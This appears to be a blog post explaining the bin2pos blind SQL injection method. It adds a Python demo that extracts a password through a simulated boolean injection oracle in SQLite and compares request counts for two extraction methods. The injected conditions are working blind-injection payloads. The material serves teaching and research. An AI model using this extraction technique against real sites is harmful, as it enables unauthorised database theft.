
Saturday, 12 October 2013

Even Faster Blind SQL injection methods

A method presented at DerbyCon and BlackHat extracts not the bits of the character itself but the bits of the character's position in a lookup table that contains a chosen set of character ASCII values (more on this later). This post discusses the conceptual advantages and fundamental drawbacks of that bin2pos method and introduces a new variant I've developed which provides better stability and needs at most 4 requests per extracted character, at the cost of some configuration requirements on the target web server.
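To make the bin2pos idea concrete before the details, here is an added example that is not code from the original post or from the DerbyCon/BlackHat talk it refers to. It simulates a boolean-based blind injection point with an in-memory SQLite database and compares the request cost of classic bit-by-bit extraction of the ASCII code against extraction of the character's position in a lookup table. The secret, the 31-entry lookup table, the `users` table, and the helper names are all constructed for the demo; the lookup table is deliberately one entry short of 32 so that a position fits in 5 bits and `instr()` returning 0 can signal a character outside the table, the case the fallback handles.

```python
"""Request-cost comparison of classic bit-by-bit blind SQL injection against
the bin2pos idea (extract bits of the character's position in a lookup table).
The vulnerable query, database and secret are all constructed for this demo."""
import sqlite3

SECRET = "s3cr3t_p4ss"   # constructed secret the attacker wants to read
# Hypothetical 31-entry lookup table in rough English letter-frequency order.
# 31 entries so that a position fits in 5 bits while 0 is free to mean
# "not in table" (SQLite's instr() returns 0 when the needle is absent).
LOOKUP = "etaoinsrhldcumfpgwybvkxjqz01234"
assert len(LOOKUP) == 31 and len(set(LOOKUP)) == 31


class BlindOracle:
    """Stands in for a vulnerable web page: answers True/False for one
    injected condition per request and counts the requests made."""

    def __init__(self, secret=SECRET):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE users(name TEXT, password TEXT)")
        self.conn.execute("INSERT INTO users VALUES ('admin', ?)", (secret,))
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        # The injected condition lands in the WHERE clause; the page either
        # renders a row (True) or nothing (False). No data comes back directly.
        sql = f"SELECT 1 FROM users WHERE name='admin' AND ({condition})"
        return self.conn.execute(sql).fetchone() is not None


def extract_bits(oracle, expr, nbits):
    """Recover an integer-valued SQL expression one bit per request (LSB first)."""
    value = 0
    for b in range(nbits):
        if oracle.ask(f"((({expr}) >> {b}) & 1) = 1"):
            value |= 1 << b
    return value


def find_length(oracle, max_len=64):
    """Bisect the secret's length so both methods know when to stop."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(f"length(password) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def classic_bitwise(oracle):
    """Baseline: 7 requests per character (bits 0..6 of the ASCII code)."""
    n = find_length(oracle)
    return "".join(
        chr(extract_bits(oracle, f"unicode(substr(password,{i},1))", 7))
        for i in range(1, n + 1))


def bin2pos(oracle):
    """bin2pos-style: 5 requests per character for the 31 table entries.
    A character absent from the table yields position 0 and costs a full
    7-bit fallback on top, which is where the method loses its advantage."""
    n = find_length(oracle)
    out = []
    for i in range(1, n + 1):
        pos = extract_bits(oracle, f"instr('{LOOKUP}', substr(password,{i},1))", 5)
        if pos == 0:  # not in the table: fall back to the raw code point
            out.append(chr(extract_bits(oracle, f"unicode(substr(password,{i},1))", 7)))
        else:
            out.append(LOOKUP[pos - 1])
    return "".join(out)


def compare():
    """Run both extractions against fresh oracles; return (result, requests) pairs."""
    a, b = BlindOracle(), BlindOracle()
    return (classic_bitwise(a), a.requests), (bin2pos(b), b.requests)


if __name__ == "__main__":
    (s1, r1), (s2, r2) = compare()
    print(f"bitwise: {s1!r} in {r1} requests")
    print(f"bin2pos: {s2!r} in {r2} requests")
```

With the constructed secret, ten of the eleven characters are in the table and only the underscore triggers the fallback, so bin2pos wins (68 requests against 83, six of each spent on the length). Feed it a secret made of characters outside the table (for example uppercase letters) and every character costs 5 + 7 requests, which is worse than the plain bitwise method; that is the trade-off the rest of the post is about.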